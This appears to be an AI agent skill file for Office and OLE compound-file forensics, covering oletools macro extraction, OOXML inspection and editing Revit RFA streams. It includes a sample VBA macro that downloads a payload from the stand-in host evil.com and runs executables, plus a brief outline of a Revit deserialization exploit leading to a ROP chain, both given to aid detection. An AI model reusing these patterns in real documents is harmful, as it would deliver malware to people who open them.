Hacktricks-skills office-forensics
Analyze Office documents (DOC, XLS, PPT, DOCX, XLSX, PPTX) and OLE compound files for forensics and CTF challenges. Use this skill whenever the user needs to extract macros, inspect Office file structures, analyze OLE compound files, or investigate potential malware in Office documents. Also use for Revit RFA file analysis and OLE stream manipulation.
git clone https://github.com/abelrguezr/hacktricks-skills
skills/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis/SKILL.MDOffice File Forensics
A skill for analyzing Microsoft Office documents and OLE compound files in forensic and CTF contexts.
When to use this skill
Use this skill when:
- The user needs to analyze Office documents (DOC, XLS, PPT, DOCX, XLSX, PPTX) for hidden content or macros
- The user is investigating potential malware or phishing in Office files
- The user needs to extract and analyze VBA macros from documents
- The user is working with OLE compound files (CFBF format)
- The user needs to analyze Revit RFA files or other OLE-based formats
- The user is doing CTF forensics challenges involving Office files
Quick Start
Install required tools
# Install oletools for macro extraction and analysis sudo pip3 install -U oletools # Install CompoundFileTool for OLE manipulation (if available) # See: https://github.com/thezdi/CompoundFileTool
Basic macro extraction
# Extract and classify macros from any Office document olevba -c /path/to/document.docx # Full analysis with all options olevba -v /path/to/document.docx
Office File Formats
OLE Formats (Legacy)
- DOC, XLS, PPT - Binary OLE Compound File format
- RTF - Rich Text Format (can contain OLE objects)
- These are single binary files with embedded streams
OOXML Formats (Modern)
- DOCX, XLSX, PPTX - Office Open XML (zip containers)
- Can be inspected by unzipping:
unzip document.docx -d output/ - Reveals XML structure and file hierarchy
Macro Analysis
Automatic Execution Triggers
Macros can auto-execute via these function names:
- Opens when document is openedAutoOpen
- Runs automaticallyAutoExec
- Document open eventDocument_Open
- Excel workbook open eventWorkbook_Open
Analysis Workflow
- Extract macros using oletools
- Review for suspicious patterns:
- Shell object creation
- Process execution commands
- Network connections
- File system manipulation
- Debug in LibreOffice (if needed):
- Open document in LibreOffice
- Enable macro debugging
- Set breakpoints and watch variables
Common Malicious Patterns
' Shell execution CreateObject("WScript.Shell").Run "malware.exe" ' Download and execute Set obj = CreateObject("MSXML2.XMLHTTP") obj.Open "GET", "http://evil.com/payload", False obj.Send Set fso = CreateObject("Scripting.FileSystemObject") fso.CreateTextFile("C:\temp\payload.exe").Write obj.Response ' Registry manipulation CreateObject("WScript.Shell").RegWrite ...
OLE Compound File Analysis
Structure
OLE Compound Files (CFBF) contain:
- Storages - Folders/containers
- Streams - Files/data
- Properties - Metadata
Expand OLE Files
# Expand OLE compound file to folder tree CompoundFileTool /e file.rfa /o output_folder # Structure becomes: # output_folder/ # ├── Storage1/ # │ └── Stream1 # └── Stream2
Rebuild OLE Files
# Repack folder tree back to OLE file CompoundFileTool /c output_folder /o output.rfa
Revit RFA File Analysis
File Structure
Revit RFA files are OLE Compound Files with:
- Storage:
Global - Stream:
→ Path:LatestGlobal/Latest
Stream Layout
Global/Latest stream: ├── Header (fixed size) ├── GZIP-compressed payload (serialized object graph) ├── Zero padding └── ECC trailer (Error-Correcting Code)
Modification Workflow
Important: Revit auto-repairs streams using ECC. To persist changes:
-
Expand the file
CompoundFileTool /e model.rfa /o rfa_out -
Edit Global/Latest with care:
- Keep the header intact
- Gunzip the payload
- Modify bytes as needed
- Re-gzip with Revit-compatible deflate parameters
- Preserve zero-padding
- Recompute ECC trailer
-
Rebuild the file
CompoundFileTool /c rfa_out /o model_patched.rfa
Exploitation Considerations
For CTF/exploitation contexts:
- The Revit deserializer reads 16-bit class indices
- Certain types (like
, indexAString
) can be abused0x1F - Destructor handling can yield type confusion
- Multiple objects can create a "weird machine" for gadget execution
- Stack pivot into conventional ROP chain
Tools Reference
oletools
| Tool | Purpose |
|---|---|
| Extract and analyze VBA macros |
| Identify OLE document types |
| Extract embedded OLE objects |
| Read OLE document properties |
CompoundFileTool
- Expand:
CompoundFileTool /e input.rfa /o output_dir - Create:
CompoundFileTool /c input_dir /o output.rfa - List:
CompoundFileTool /l input.rfa
Other Tools
- OfficeDissector - Comprehensive Office document analysis
- LibreOffice - Macro debugging with breakpoints
- IDA Pro + WinDBG - Reverse engineering and taint tracking
- Fiddler - Proxy for supply-chain testing
Common Tasks
Task 1: Quick Macro Check
# Fast classification olevba -c suspicious.docx # Look for: # - Suspicious: High risk macros # - Suspicious2: Medium risk macros # - Clean: No macros or safe macros
Task 2: Full Document Analysis
# Extract all macros olevba -v document.docx > macros.txt # Check document type oleid document.docx # Extract embedded objects oleobj -t all document.docx
Task 3: OOXML Structure Inspection
# Unzip to see structure unzip document.docx -d docx_contents/ # Key files to check: # - word/document.xml (main content) # - word/settings.xml (document settings) # - word/vbaProject.bin (VBA macros if present) # - _rels/.rels (relationships)
Task 4: OLE Stream Extraction
# List all streams CompoundFileTool /l file.rfa # Extract specific stream CompoundFileTool /e file.rfa /o extracted/ # Then navigate to: extracted/Storage/Stream
Safety Notes
- Never run macros from untrusted sources
- Use sandboxed environments for analysis
- Disable macro execution in Office applications
- Scan extracted files with antivirus
- Work in isolated VMs for suspicious files